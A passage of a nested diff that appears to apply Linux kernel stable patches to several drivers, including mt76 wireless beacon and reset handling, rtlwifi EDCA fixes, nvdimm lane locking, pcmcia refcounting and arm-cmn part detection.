++		dev->beacon_check = MT7603_WATCHDOG_TIMEOUT;
++		goto out;
++	}
+ 
++	mt76_tx_queue_skb(dev, dev->mphy.q_tx[MT_TXQ_BEACON],
++			  MT_TXQ_BEACON, skb, &mvif->sta.wcid, NULL);
++
++out:
+ 	spin_unlock_bh(&dev->ps_lock);
+ }
+ 
+@@ -81,6 +113,18 @@ void mt7603_pre_tbtt_tasklet(struct tasklet_struct *t)
+ 	data.dev = dev;
+ 	__skb_queue_head_init(&data.q);
+ 
++	/* Flush all previous CAB queue packets and beacons */
++	mt76_wr(dev, MT_WF_ARB_CAB_FLUSH, GENMASK(30, 16) | BIT(0));
++
++	mt76_queue_tx_cleanup(dev, dev->mphy.q_tx[MT_TXQ_CAB], false);
++	mt76_queue_tx_cleanup(dev, dev->mphy.q_tx[MT_TXQ_BEACON], false);
++
++	if (dev->mphy.q_tx[MT_TXQ_BEACON]->queued > 0)
++		dev->beacon_check++;
++	else
++		dev->beacon_check = 0;
++	mt7603_mac_stuck_beacon_recovery(dev);
++
+ 	q = dev->mphy.q_tx[MT_TXQ_BEACON];
+ 	spin_lock(&q->lock);
+ 	ieee80211_iterate_active_interfaces_atomic(mt76_hw(dev),
+@@ -89,14 +133,9 @@ void mt7603_pre_tbtt_tasklet(struct tasklet_struct *t)
+ 	mt76_queue_kick(dev, q);
+ 	spin_unlock(&q->lock);
+ 
+-	/* Flush all previous CAB queue packets */
+-	mt76_wr(dev, MT_WF_ARB_CAB_FLUSH, GENMASK(30, 16) | BIT(0));
+-
+-	mt76_queue_tx_cleanup(dev, dev->mphy.q_tx[MT_TXQ_CAB], false);
+-
+ 	mt76_csa_check(mdev);
+ 	if (mdev->csa_complete)
+-		goto out;
++		return;
+ 
+ 	q = dev->mphy.q_tx[MT_TXQ_CAB];
+ 	do {
+@@ -108,7 +147,7 @@ void mt7603_pre_tbtt_tasklet(struct tasklet_struct *t)
+ 		 skb_queue_len(&data.q) < 8);
+ 
+ 	if (skb_queue_empty(&data.q))
+-		goto out;
++		return;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(data.tail); i++) {
+ 		if (!data.tail[i])
+@@ -136,11 +175,6 @@ void mt7603_pre_tbtt_tasklet(struct tasklet_struct *t)
+ 		MT_WF_ARB_CAB_START_BSSn(0) |
+ 		(MT_WF_ARB_CAB_START_BSS0n(1) *
+ 		 ((1 << (MT7603_MAX_INTERFACES - 1)) - 1)));
+-
+-out:
+-	mt76_queue_tx_cleanup(dev, dev->mphy.q_tx[MT_TXQ_BEACON], false);
+-	if (dev->mphy.q_tx[MT_TXQ_BEACON]->queued > hweight8(mdev->beacon_mask))
+-		dev->beacon_check++;
+ }
+ 
+ void mt7603_beacon_set_timer(struct mt7603_dev *dev, int idx, int intval)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/core.c b/drivers/net/wireless/mediatek/mt76/mt7603/core.c
+index 60a996b63c0c0..915b8349146af 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/core.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/core.c
+@@ -42,11 +42,13 @@ irqreturn_t mt7603_irq_handler(int irq, void *dev_instance)
+ 	}
+ 
+ 	if (intr & MT_INT_RX_DONE(0)) {
++		dev->rx_pse_check = 0;
+ 		mt7603_irq_disable(dev, MT_INT_RX_DONE(0));
+ 		napi_schedule(&dev->mt76.napi[0]);
+ 	}
+ 
+ 	if (intr & MT_INT_RX_DONE(1)) {
++		dev->rx_pse_check = 0;
+ 		mt7603_irq_disable(dev, MT_INT_RX_DONE(1));
+ 		napi_schedule(&dev->mt76.napi[1]);
+ 	}
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+index 6cff346d57a78..2980e1234d13f 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+@@ -1430,15 +1430,6 @@ static void mt7603_mac_watchdog_reset(struct mt7603_dev *dev)
+ 
+ 	mt7603_beacon_set_timer(dev, -1, 0);
+ 
+-	if (dev->reset_cause[RESET_CAUSE_RESET_FAILED] ||
+-	    dev->cur_reset_cause == RESET_CAUSE_RX_PSE_BUSY ||
+-	    dev->cur_reset_cause == RESET_CAUSE_BEACON_STUCK ||
+-	    dev->cur_reset_cause == RESET_CAUSE_TX_HANG)
+-		mt7603_pse_reset(dev);
+-
+-	if (dev->reset_cause[RESET_CAUSE_RESET_FAILED])
+-		goto skip_dma_reset;
+-
+ 	mt7603_mac_stop(dev);
+ 
+ 	mt76_clear(dev, MT_WPDMA_GLO_CFG,
+@@ -1448,28 +1439,32 @@ static void mt7603_mac_watchdog_reset(struct mt7603_dev *dev)
+ 
+ 	mt7603_irq_disable(dev, mask);
+ 
+-	mt76_set(dev, MT_WPDMA_GLO_CFG, MT_WPDMA_GLO_CFG_FORCE_TX_EOF);
+-
+ 	mt7603_pse_client_reset(dev);
+ 
+ 	mt76_queue_tx_cleanup(dev, dev->mt76.q_mcu[MT_MCUQ_WM], true);
+ 	for (i = 0; i < __MT_TXQ_MAX; i++)
+ 		mt76_queue_tx_cleanup(dev, dev->mphy.q_tx[i], true);
+ 
++	mt7603_dma_sched_reset(dev);
++
++	mt76_tx_status_check(&dev->mt76, true);
++
+ 	mt76_for_each_q_rx(&dev->mt76, i) {
+ 		mt76_queue_rx_reset(dev, i);
+ 	}
+ 
+-	mt76_tx_status_check(&dev->mt76, true);
++	if (dev->reset_cause[RESET_CAUSE_RESET_FAILED] ||
++	    dev->cur_reset_cause == RESET_CAUSE_RX_PSE_BUSY)
++		mt7603_pse_reset(dev);
+ 
+-	mt7603_dma_sched_reset(dev);
++	if (!dev->reset_cause[RESET_CAUSE_RESET_FAILED]) {
++		mt7603_mac_dma_start(dev);
+ 
+-	mt7603_mac_dma_start(dev);
++		mt7603_irq_enable(dev, mask);
+ 
+-	mt7603_irq_enable(dev, mask);
++		clear_bit(MT76_RESET, &dev->mphy.state);
++	}
+ 
+-skip_dma_reset:
+-	clear_bit(MT76_RESET, &dev->mphy.state);
+ 	mutex_unlock(&dev->mt76.mutex);
+ 
+ 	mt76_worker_enable(&dev->mt76.tx_worker);
+@@ -1559,20 +1554,29 @@ static bool mt7603_rx_pse_busy(struct mt7603_dev *dev)
+ {
+ 	u32 addr, val;
+ 
+-	if (mt76_rr(dev, MT_MCU_DEBUG_RESET) & MT_MCU_DEBUG_RESET_QUEUES)
+-		return true;
+-
+ 	if (mt7603_rx_fifo_busy(dev))
+-		return false;
++		goto out;
+ 
+ 	addr = mt7603_reg_map(dev, MT_CLIENT_BASE_PHYS_ADDR + MT_CLIENT_STATUS);
+ 	mt76_wr(dev, addr, 3);
+ 	val = mt76_rr(dev, addr) >> 16;
+ 
+-	if (is_mt7628(dev) && (val & 0x4001) == 0x4001)
+-		return true;
++	if (!(val & BIT(0)))
++		return false;
+ 
+-	return (val & 0x8001) == 0x8001 || (val & 0xe001) == 0xe001;
++	if (is_mt7628(dev))
++		val &= 0xa000;
++	else
++		val &= 0x8000;
++	if (!val)
++		return false;
++
++out:
++	if (mt76_rr(dev, MT_INT_SOURCE_CSR) &
++	    (MT_INT_RX_DONE(0) | MT_INT_RX_DONE(1)))
++		return false;
++
++	return true;
+ }
+ 
+ static bool
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/regs.h b/drivers/net/wireless/mediatek/mt76/mt7603/regs.h
+index 3b901090b29c6..9b84db233aceb 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/regs.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/regs.h
+@@ -462,6 +462,11 @@ enum {
+ #define MT_WF_SEC_BASE			0x21a00
+ #define MT_WF_SEC(ofs)			(MT_WF_SEC_BASE + (ofs))
+ 
++#define MT_WF_CFG_OFF_BASE		0x21e00
++#define MT_WF_CFG_OFF(ofs)		(MT_WF_CFG_OFF_BASE + (ofs))
++#define MT_WF_CFG_OFF_WOCCR		MT_WF_CFG_OFF(0x004)
++#define MT_WF_CFG_OFF_WOCCR_TMAC_GC_DIS	BIT(4)
++
+ #define MT_SEC_SCR			MT_WF_SEC(0x004)
+ #define MT_SEC_SCR_MASK_ORDER		GENMASK(1, 0)
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+index bcfc30d669c20..b2ea539f697f7 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+@@ -988,13 +988,13 @@ mt7915_is_ebf_supported(struct mt7915_phy *phy, struct ieee80211_vif *vif,
+ 			struct ieee80211_sta *sta, bool bfee)
+ {
+ 	struct mt7915_vif *mvif = (struct mt7915_vif *)vif->drv_priv;
+-	int tx_ant = hweight8(phy->mt76->chainmask) - 1;
++	int sts = hweight16(phy->mt76->chainmask);
+ 
+ 	if (vif->type != NL80211_IFTYPE_STATION &&
+ 	    vif->type != NL80211_IFTYPE_AP)
+ 		return false;
+ 
+-	if (!bfee && tx_ant < 2)
++	if (!bfee && sts < 2)
+ 		return false;
+ 
+ 	if (sta->deflink.he_cap.has_he) {
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/dm.c b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/dm.c
+index 6f61d6a106272..5a34894a533be 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/dm.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/dm.c
+@@ -799,7 +799,7 @@ static void rtl88e_dm_check_edca_turbo(struct ieee80211_hw *hw)
+ 	}
+ 
+ 	if (rtlpriv->btcoexist.bt_edca_dl != 0) {
+-		edca_be_ul = rtlpriv->btcoexist.bt_edca_dl;
++		edca_be_dl = rtlpriv->btcoexist.bt_edca_dl;
+ 		bt_change_edca = true;
+ 	}
+ 
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192c/dm_common.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192c/dm_common.c
+index 0b6a15c2e5ccd..d92aad60edfe9 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192c/dm_common.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192c/dm_common.c
+@@ -640,7 +640,7 @@ static void rtl92c_dm_check_edca_turbo(struct ieee80211_hw *hw)
+ 	}
+ 
+ 	if (rtlpriv->btcoexist.bt_edca_dl != 0) {
+-		edca_be_ul = rtlpriv->btcoexist.bt_edca_dl;
++		edca_be_dl = rtlpriv->btcoexist.bt_edca_dl;
+ 		bt_change_edca = true;
+ 	}
+ 
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/dm.c b/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/dm.c
+index 8ada31380efa4..0ff8e355c23a4 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/dm.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/dm.c
+@@ -466,7 +466,7 @@ static void rtl8723e_dm_check_edca_turbo(struct ieee80211_hw *hw)
+ 	}
+ 
+ 	if (rtlpriv->btcoexist.bt_edca_dl != 0) {
+-		edca_be_ul = rtlpriv->btcoexist.bt_edca_dl;
++		edca_be_dl = rtlpriv->btcoexist.bt_edca_dl;
+ 		bt_change_edca = true;
+ 	}
+ 
+diff --git a/drivers/net/wireless/realtek/rtw88/debug.c b/drivers/net/wireless/realtek/rtw88/debug.c
+index 9ebe544e51d0d..abd750c3c28e5 100644
+--- a/drivers/net/wireless/realtek/rtw88/debug.c
++++ b/drivers/net/wireless/realtek/rtw88/debug.c
+@@ -1191,9 +1191,9 @@ static struct rtw_debugfs_priv rtw_debug_priv_dm_cap = {
+ #define rtw_debugfs_add_core(name, mode, fopname, parent)		\
+ 	do {								\
+ 		rtw_debug_priv_ ##name.rtwdev = rtwdev;			\
+-		if (!debugfs_create_file(#name, mode,			\
++		if (IS_ERR(debugfs_create_file(#name, mode,		\
+ 					 parent, &rtw_debug_priv_ ##name,\
+-					 &file_ops_ ##fopname))		\
++					 &file_ops_ ##fopname)))	\
+ 			pr_debug("Unable to initialize debugfs:%s\n",	\
+ 			       #name);					\
+ 	} while (0)
+diff --git a/drivers/net/wireless/silabs/wfx/data_tx.c b/drivers/net/wireless/silabs/wfx/data_tx.c
+index 6a5e52a96d183..caa22226b01bc 100644
+--- a/drivers/net/wireless/silabs/wfx/data_tx.c
++++ b/drivers/net/wireless/silabs/wfx/data_tx.c
+@@ -226,53 +226,40 @@ static u8 wfx_tx_get_link_id(struct wfx_vif *wvif, struct ieee80211_sta *sta,
+ 
+ static void wfx_tx_fixup_rates(struct ieee80211_tx_rate *rates)
+ {
+-	int i;
+-	bool finished;
++	bool has_rate0 = false;
++	int i, j;
+ 
+-	/* Firmware is not able to mix rates with different flags */
+-	for (i = 0; i < IEEE80211_TX_MAX_RATES; i++) {
+-		if (rates[0].flags & IEEE80211_TX_RC_SHORT_GI)
+-			rates[i].flags |= IEEE80211_TX_RC_SHORT_GI;
+-		if (!(rates[0].flags & IEEE80211_TX_RC_SHORT_GI))
++	for (i = 1, j = 1; j < IEEE80211_TX_MAX_RATES; j++) {
++		if (rates[j].idx == -1)
++			break;
++		/* The device use the rates in descending order, whatever the request from minstrel.
++		 * We have to trade off here. Most important is to respect the primary rate
++		 * requested by minstrel. So, we drops the entries with rate higher than the
++		 * previous.
++		 */
++		if (rates[j].idx >= rates[i - 1].idx) {
++			rates[i - 1].count += rates[j].count;
++			rates[i - 1].count = min_t(u16, 15, rates[i - 1].count);
++		} else {
++			memcpy(rates + i, rates + j, sizeof(rates[i]));
++			if (rates[i].idx == 0)
++				has_rate0 = true;
++			/* The device apply Short GI only on the first rate */
+ 			rates[i].flags &= ~IEEE80211_TX_RC_SHORT_GI;
+-		if (!(rates[0].flags & IEEE80211_TX_RC_USE_RTS_CTS))
+-			rates[i].flags &= ~IEEE80211_TX_RC_USE_RTS_CTS;
+-	}
+-
+-	/* Sort rates and remove duplicates */
+-	do {
+-		finished = true;
+-		for (i = 0; i < IEEE80211_TX_MAX_RATES - 1; i++) {
+-			if (rates[i + 1].idx == rates[i].idx &&
+-			    rates[i].idx != -1) {
+-				rates[i].count += rates[i + 1].count;
+-				if (rates[i].count > 15)
+-					rates[i].count = 15;
+-				rates[i + 1].idx = -1;
+-				rates[i + 1].count = 0;
+-
+-				finished = false;
+-			}
+-			if (rates[i + 1].idx > rates[i].idx) {
+-				swap(rates[i + 1], rates[i]);
+-				finished = false;
+-			}
++			i++;
+ 		}
+-	} while (!finished);
++	}
+ 	/* Ensure that MCS0 or 1Mbps is present at the end of the retry list */
+-	for (i = 0; i < IEEE80211_TX_MAX_RATES; i++) {
+-		if (rates[i].idx == 0)
+-			break;
+-		if (rates[i].idx == -1) {
+-			rates[i].idx = 0;
+-			rates[i].count = 8; /* == hw->max_rate_tries */
+-			rates[i].flags = rates[i - 1].flags & IEEE80211_TX_RC_MCS;
+-			break;
+-		}
++	if (!has_rate0 && i < IEEE80211_TX_MAX_RATES) {
++		rates[i].idx = 0;
++		rates[i].count = 8; /* == hw->max_rate_tries */
++		rates[i].flags = rates[0].flags & IEEE80211_TX_RC_MCS;
++		i++;
++	}
++	for (; i < IEEE80211_TX_MAX_RATES; i++) {
++		memset(rates + i, 0, sizeof(rates[i]));
++		rates[i].idx = -1;
+ 	}
+-	/* All retries use long GI */
+-	for (i = 1; i < IEEE80211_TX_MAX_RATES; i++)
+-		rates[i].flags &= ~IEEE80211_TX_RC_SHORT_GI;
+ }
+ 
+ static u8 wfx_tx_get_retry_policy_id(struct wfx_vif *wvif, struct ieee80211_tx_info *tx_info)
+diff --git a/drivers/nvdimm/of_pmem.c b/drivers/nvdimm/of_pmem.c
+index 10dbdcdfb9ce9..0243789ba914b 100644
+--- a/drivers/nvdimm/of_pmem.c
++++ b/drivers/nvdimm/of_pmem.c
+@@ -30,7 +30,13 @@ static int of_pmem_region_probe(struct platform_device *pdev)
+ 	if (!priv)
+ 		return -ENOMEM;
+ 
+-	priv->bus_desc.provider_name = kstrdup(pdev->name, GFP_KERNEL);
++	priv->bus_desc.provider_name = devm_kstrdup(&pdev->dev, pdev->name,
++							GFP_KERNEL);
++	if (!priv->bus_desc.provider_name) {
++		kfree(priv);
++		return -ENOMEM;
++	}
++
+ 	priv->bus_desc.module = THIS_MODULE;
+ 	priv->bus_desc.of_node = np;
+ 
+diff --git a/drivers/nvdimm/region_devs.c b/drivers/nvdimm/region_devs.c
+index e0875d3697624..7995f93db2a82 100644
+--- a/drivers/nvdimm/region_devs.c
++++ b/drivers/nvdimm/region_devs.c
+@@ -892,7 +892,8 @@ unsigned int nd_region_acquire_lane(struct nd_region *nd_region)
+ {
+ 	unsigned int cpu, lane;
+ 
+-	cpu = get_cpu();
++	migrate_disable();
++	cpu = smp_processor_id();
+ 	if (nd_region->num_lanes < nr_cpu_ids) {
+ 		struct nd_percpu_lane *ndl_lock, *ndl_count;
+ 
+@@ -911,16 +912,15 @@ EXPORT_SYMBOL(nd_region_acquire_lane);
+ void nd_region_release_lane(struct nd_region *nd_region, unsigned int lane)
+ {
+ 	if (nd_region->num_lanes < nr_cpu_ids) {
+-		unsigned int cpu = get_cpu();
++		unsigned int cpu = smp_processor_id();
+ 		struct nd_percpu_lane *ndl_lock, *ndl_count;
+ 
+ 		ndl_count = per_cpu_ptr(nd_region->lane, cpu);
+ 		ndl_lock = per_cpu_ptr(nd_region->lane, lane);
+ 		if (--ndl_count->count == 0)
+ 			spin_unlock(&ndl_lock->lock);
+-		put_cpu();
+ 	}
+-	put_cpu();
++	migrate_enable();
+ }
+ EXPORT_SYMBOL(nd_region_release_lane);
+ 
+diff --git a/drivers/nvme/host/ioctl.c b/drivers/nvme/host/ioctl.c
+index b33004a4bcb5a..91e6d03475798 100644
+--- a/drivers/nvme/host/ioctl.c
++++ b/drivers/nvme/host/ioctl.c
+@@ -435,10 +435,13 @@ static enum rq_end_io_ret nvme_uring_cmd_end_io(struct request *req,
+ 	void *cookie = READ_ONCE(ioucmd->cookie);
+ 
+ 	req->bio = pdu->bio;
+-	if (nvme_req(req)->flags & NVME_REQ_CANCELLED)
++	if (nvme_req(req)->flags & NVME_REQ_CANCELLED) {
+ 		pdu->nvme_status = -EINTR;
+-	else
++	} else {
+ 		pdu->nvme_status = nvme_req(req)->status;
++		if (!pdu->nvme_status)
++			pdu->nvme_status = blk_status_to_errno(err);
++	}
+ 	pdu->u.result = le64_to_cpu(nvme_req(req)->result.u64);
+ 
+ 	/*
+diff --git a/drivers/pci/controller/vmd.c b/drivers/pci/controller/vmd.c
+index d4c9b888a79d7..5c35884c226e6 100644
+--- a/drivers/pci/controller/vmd.c
++++ b/drivers/pci/controller/vmd.c
+@@ -510,8 +510,7 @@ static void vmd_domain_reset(struct vmd_dev *vmd)
+ 			base = vmd->cfgbar + PCIE_ECAM_OFFSET(bus,
+ 						PCI_DEVFN(dev, 0), 0);
+ 
+-			hdr_type = readb(base + PCI_HEADER_TYPE) &
+-					 PCI_HEADER_TYPE_MASK;
++			hdr_type = readb(base + PCI_HEADER_TYPE);
+ 
+ 			functions = (hdr_type & 0x80) ? 8 : 1;
+ 			for (fn = 0; fn < functions; fn++) {
+diff --git a/drivers/pcmcia/cs.c b/drivers/pcmcia/cs.c
+index f70197154a362..820cce7c8b400 100644
+--- a/drivers/pcmcia/cs.c
++++ b/drivers/pcmcia/cs.c
+@@ -605,6 +605,7 @@ static int pccardd(void *__skt)
+ 		dev_warn(&skt->dev, "PCMCIA: unable to register socket\n");
+ 		skt->thread = NULL;
+ 		complete(&skt->thread_done);
++		put_device(&skt->dev);
+ 		return 0;
+ 	}
+ 	ret = pccard_sysfs_add_socket(&skt->dev);
+diff --git a/drivers/pcmcia/ds.c b/drivers/pcmcia/ds.c
+index ace133b9f7d45..2eb81d9484d27 100644
+--- a/drivers/pcmcia/ds.c
++++ b/drivers/pcmcia/ds.c
+@@ -513,9 +513,6 @@ static struct pcmcia_device *pcmcia_device_add(struct pcmcia_socket *s,
+ 	/* by default don't allow DMA */
+ 	p_dev->dma_mask = 0;
+ 	p_dev->dev.dma_mask = &p_dev->dma_mask;
+-	dev_set_name(&p_dev->dev, "%d.%d", p_dev->socket->sock, p_dev->device_no);
+-	if (!dev_name(&p_dev->dev))
+-		goto err_free;
+ 	p_dev->devname = kasprintf(GFP_KERNEL, "pcmcia%s", dev_name(&p_dev->dev));
+ 	if (!p_dev->devname)
+ 		goto err_free;
+@@ -573,8 +570,15 @@ static struct pcmcia_device *pcmcia_device_add(struct pcmcia_socket *s,
+ 
+ 	pcmcia_device_query(p_dev);
+ 
+-	if (device_register(&p_dev->dev))
+-		goto err_unreg;
++	dev_set_name(&p_dev->dev, "%d.%d", p_dev->socket->sock, p_dev->device_no);
++	if (device_register(&p_dev->dev)) {
++		mutex_lock(&s->ops_mutex);
++		list_del(&p_dev->socket_device_list);
++		s->device_count--;
++		mutex_unlock(&s->ops_mutex);
++		put_device(&p_dev->dev);
++		return NULL;
++	}
+ 
+ 	return p_dev;
+ 
+diff --git a/drivers/perf/arm-cmn.c b/drivers/perf/arm-cmn.c
+index cfb36adf4eb80..47e7c3206939f 100644
+--- a/drivers/perf/arm-cmn.c
++++ b/drivers/perf/arm-cmn.c
+@@ -44,8 +44,11 @@
+ #define CMN_MAX_DTMS			(CMN_MAX_XPS + (CMN_MAX_DIMENSION - 1) * 4)
+ 
+ /* The CFG node has various info besides the discovery tree */
+-#define CMN_CFGM_PERIPH_ID_2		0x0010
+-#define CMN_CFGM_PID2_REVISION		GENMASK(7, 4)
++#define CMN_CFGM_PERIPH_ID_01		0x0008
++#define CMN_CFGM_PID0_PART_0		GENMASK_ULL(7, 0)
++#define CMN_CFGM_PID1_PART_1		GENMASK_ULL(35, 32)
++#define CMN_CFGM_PERIPH_ID_23		0x0010
++#define CMN_CFGM_PID2_REVISION		GENMASK_ULL(7, 4)
+ 
+ #define CMN_CFGM_INFO_GLOBAL		0x900
+ #define CMN_INFO_MULTIPLE_DTM_EN	BIT_ULL(63)
+@@ -107,7 +110,9 @@
+ 
+ #define CMN_DTM_PMEVCNTSR		0x240
+ 
+-#define CMN_DTM_UNIT_INFO		0x0910
++#define CMN650_DTM_UNIT_INFO		0x0910
++#define CMN_DTM_UNIT_INFO		0x0960
++#define CMN_DTM_UNIT_INFO_DTC_DOMAIN	GENMASK_ULL(1, 0)
+ 
+ #define CMN_DTM_NUM_COUNTERS		4
+ /* Want more local counters? Why not replicate the whole DTM! Ugh... */
+@@ -186,6 +191,7 @@
+ #define CMN_WP_DOWN			2
+ 
+ 
++/* Internal values for encoding event support */
+ enum cmn_model {
+ 	CMN600 = 1,
+ 	CMN650 = 2,
+@@ -197,26 +203,34 @@ enum cmn_model {
+ 	CMN_650ON = CMN650 | CMN700,
+ };
+ 
++/* Actual part numbers and revision IDs defined by the hardware */
++enum cmn_part {
++	PART_CMN600 = 0x434,
++	PART_CMN650 = 0x436,
++	PART_CMN700 = 0x43c,
++	PART_CI700 = 0x43a,
++};
++
+ /* CMN-600 r0px shouldn't exist in silicon, thankfully */
+ enum cmn_revision {
+-	CMN600_R1P0,
+-	CMN600_R1P1,
+-	CMN600_R1P2,
+-	CMN600_R1P3,
+-	CMN600_R2P0,
+-	CMN600_R3P0,
+-	CMN600_R3P1,
+-	CMN650_R0P0 = 0,
+-	CMN650_R1P0,
+-	CMN650_R1P1,
+-	CMN650_R2P0,
+-	CMN650_R1P2,
+-	CMN700_R0P0 = 0,
+-	CMN700_R1P0,
+-	CMN700_R2P0,
+-	CI700_R0P0 = 0,
+-	CI700_R1P0,
+-	CI700_R2P0,
++	REV_CMN600_R1P0,
++	REV_CMN600_R1P1,
++	REV_CMN600_R1P2,
++	REV_CMN600_R1P3,
++	REV_CMN600_R2P0,
++	REV_CMN600_R3P0,
++	REV_CMN600_R3P1,
++	REV_CMN650_R0P0 = 0,
++	REV_CMN650_R1P0,
++	REV_CMN650_R1P1,
++	REV_CMN650_R2P0,
++	REV_CMN650_R1P2,
++	REV_CMN700_R0P0 = 0,
++	REV_CMN700_R1P0,
++	REV_CMN700_R2P0,
++	REV_CI700_R0P0 = 0,
++	REV_CI700_R1P0,
++	REV_CI700_R2P0,
+ };
+ 
+ enum cmn_node_type {
+@@ -306,7 +320,7 @@ struct arm_cmn {
+ 	unsigned int state;
+ 
+ 	enum cmn_revision rev;
+-	enum cmn_model model;
++	enum cmn_part part;
+ 	u8 mesh_x;
+ 	u8 mesh_y;
+ 	u16 num_xps;
+@@ -394,19 +408,35 @@ static struct arm_cmn_node *arm_cmn_node(const struct arm_cmn *cmn,
+ 	return NULL;
+ }
+ 
++static enum cmn_model arm_cmn_model(const struct arm_cmn *cmn)
++{
++	switch (cmn->part) {
++	case PART_CMN600:
++		return CMN600;
++	case PART_CMN650:
++		return CMN650;
++	case PART_CMN700:
++		return CMN700;
++	case PART_CI700:
++		return CI700;
++	default:
++		return 0;
++	};
++}
++
+ static u32 arm_cmn_device_connect_info(const struct arm_cmn *cmn,
+ 				       const struct arm_cmn_node *xp, int port)
+ {
+ 	int offset = CMN_MXP__CONNECT_INFO(port);
+ 
+ 	if (port >= 2) {
+-		if (cmn->model & (CMN600 | CMN650))
++		if (cmn->part == PART_CMN600 || cmn->part == PART_CMN650)
+ 			return 0;
+ 		/*
+ 		 * CI-700 may have extra ports, but still has the
+ 		 * mesh_port_connect_info registers in the way.
+ 		 */
+-		if (cmn->model == CI700)
++		if (cmn->part == PART_CI700)
+ 			offset += CI700_CONNECT_INFO_P2_5_OFFSET;
+ 	}
+ 
+@@ -640,7 +670,7 @@ static umode_t arm_cmn_event_attr_is_visible(struct kobject *kobj,
+ 
+ 	eattr = container_of(attr, typeof(*eattr), attr.attr);
+ 
+-	if (!(eattr->model & cmn->model))
++	if (!(eattr->model & arm_cmn_model(cmn)))
+ 		return 0;
+ 
+ 	type = eattr->type;
+@@ -658,7 +688,7 @@ static umode_t arm_cmn_event_attr_is_visible(struct kobject *kobj,
+ 		if ((intf & 4) && !(cmn->ports_used & BIT(intf & 3)))
+ 			return 0;
+ 
+-		if (chan == 4 && cmn->model == CMN600)
++		if (chan == 4 && cmn->part == PART_CMN600)
+ 			return 0;
+ 
+ 		if ((chan == 5 && cmn->rsp_vc_num < 2) ||
+@@ -669,19 +699,19 @@ static umode_t arm_cmn_event_attr_is_visible(struct kobject *kobj,
+ 	}
+ 
+ 	/* Revision-specific differences */
+-	if (cmn->model == CMN600) {
+-		if (cmn->rev < CMN600_R1P3) {
++	if (cmn->part == PART_CMN600) {
++		if (cmn->rev < REV_CMN600_R1P3) {
+ 			if (type == CMN_TYPE_CXRA && eventid > 0x10)
+ 				return 0;
+ 		}
+-		if (cmn->rev < CMN600_R1P2) {
++		if (cmn->rev < REV_CMN600_R1P2) {
+ 			if (type == CMN_TYPE_HNF && eventid == 0x1b)
+ 				return 0;
+ 			if (type == CMN_TYPE_CXRA || type == CMN_TYPE_CXHA)
+ 				return 0;
+ 		}
+-	} else if (cmn->model == CMN650) {
+-		if (cmn->rev < CMN650_R2P0 || cmn->rev == CMN650_R1P2) {
++	} else if (cmn->part == PART_CMN650) {
++		if (cmn->rev < REV_CMN650_R2P0 || cmn->rev == REV_CMN650_R1P2) {
+ 			if (type == CMN_TYPE_HNF && eventid > 0x22)
+ 				return 0;
+ 			if (type == CMN_TYPE_SBSX && eventid == 0x17)
+@@ -689,8 +719,8 @@ static umode_t arm_cmn_event_attr_is_visible(struct kobject *kobj,
+ 			if (type == CMN_TYPE_RNI && eventid > 0x10)
+ 				return 0;
+ 		}
+-	} else if (cmn->model == CMN700) {
+-		if (cmn->rev < CMN700_R2P0) {
++	} else if (cmn->part == PART_CMN700) {
++		if (cmn->rev < REV_CMN700_R2P0) {
+ 			if (type == CMN_TYPE_HNF && eventid > 0x2c)
+ 				return 0;
+ 			if (type == CMN_TYPE_CCHA && eventid > 0x74)
+@@ -698,7 +728,7 @@ static umode_t arm_cmn_event_attr_is_visible(struct kobject *kobj,
+ 			if (type == CMN_TYPE_CCLA && eventid > 0x27)
+ 				return 0;
+ 		}
+-		if (cmn->rev < CMN700_R1P0) {
++		if (cmn->rev < REV_CMN700_R1P0) {
+ 			if (type == CMN_TYPE_HNF && eventid > 0x2b)
+ 				return 0;
+ 		}
+@@ -1200,7 +1230,7 @@ static u32 arm_cmn_wp_config(struct perf_event *event)
+ 	u32 grp = CMN_EVENT_WP_GRP(event);
+ 	u32 exc = CMN_EVENT_WP_EXCLUSIVE(event);
+ 	u32 combine = CMN_EVENT_WP_COMBINE(event);
+-	bool is_cmn600 = to_cmn(event->pmu)->model == CMN600;
++	bool is_cmn600 = to_cmn(event->pmu)->part == PART_CMN600;
+ 
+ 	config = FIELD_PREP(CMN_DTM_WPn_CONFIG_WP_DEV_SEL, dev) |
+ 		 FIELD_PREP(CMN_DTM_WPn_CONFIG_WP_CHN_SEL, chn) |
+@@ -1520,14 +1550,14 @@ done:
+ 	return ret;
+ }
+ 
+-static enum cmn_filter_select arm_cmn_filter_sel(enum cmn_model model,
++static enum cmn_filter_select arm_cmn_filter_sel(const struct arm_cmn *cmn,
+ 						 enum cmn_node_type type,
+ 						 unsigned int eventid)
+ {
+ 	struct arm_cmn_event_attr *e;
+-	int i;
++	enum cmn_model model = arm_cmn_model(cmn);
+ 
+-	for (i = 0; i < ARRAY_SIZE(arm_cmn_event_attrs) - 1; i++) {
++	for (int i = 0; i < ARRAY_SIZE(arm_cmn_event_attrs) - 1; i++) {
+ 		e = container_of(arm_cmn_event_attrs[i], typeof(*e), attr.attr);
